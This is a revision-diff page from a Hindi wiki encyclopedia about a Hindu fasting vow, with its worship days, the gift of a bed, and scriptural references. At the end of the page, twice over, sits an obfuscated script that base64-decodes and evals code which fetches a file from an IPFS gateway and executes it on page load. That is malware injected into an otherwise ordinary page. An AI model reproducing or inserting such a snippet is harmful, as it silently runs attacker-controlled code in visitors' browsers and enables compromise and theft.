Difference between revisions of "भोगावाप्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (भोगवाप्ति व्रत का नाम बदलकर भोगावाप्ति व्रत कर दिया गया है)
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*[[ज्येष्ठ]] [[पूर्णिमा]] के उपरान्त प्रथम तिथि से तीन दिनों तक [[विष्णु|हरि]] पूजा की जाती है।  
+
*[[ज्येष्ठ पूर्णिमा]] के उपरान्त प्रथम तिथि से तीन दिनों तक [[विष्णु|हरि]] पूजा की जाती है।  
 
*पलंग का दान किया जाता है।  
 
*पलंग का दान किया जाता है।  
 
*ऐसी मान्यता है कि आनन्दोपलब्धि और स्वर्ग की प्राप्ति होती है।<ref>विष्णुधर्मोत्तरपुराण (3|212|1-3); हेमाद्रि (व्रत0 2, 752)।</ref>
 
*ऐसी मान्यता है कि आनन्दोपलब्धि और स्वर्ग की प्राप्ति होती है।<ref>विष्णुधर्मोत्तरपुराण (3|212|1-3); हेमाद्रि (व्रत0 2, 752)।</ref>
  
  
 
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
{{पर्व और त्योहार}}
+
{{पर्व और त्योहार}}{{व्रत और उत्सव}}
{{व्रत और उत्सव}}
+
[[Category:व्रत और उत्सव]][[Category:संस्कृति कोश]][[Category:पर्व और त्योहार]]
 
 
[[Category:व्रत और उत्सव]]
 
[[Category:संस्कृति कोश]]  
 
[[Category:पर्व और त्योहार]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 09:09, 2 June 2015

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jyeshth poornima ke uparant pratham tithi se tin dinoan tak hari pooja ki jati hai.
  • palang ka dan kiya jata hai.
  • aisi manyata hai ki anandopalabdhi aur svarg ki prapti hoti hai.[1]


tika tippani aur sandarbh

  1. vishnudharmottarapuran (3|212|1-3); hemadri (vrat0 2, 752).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>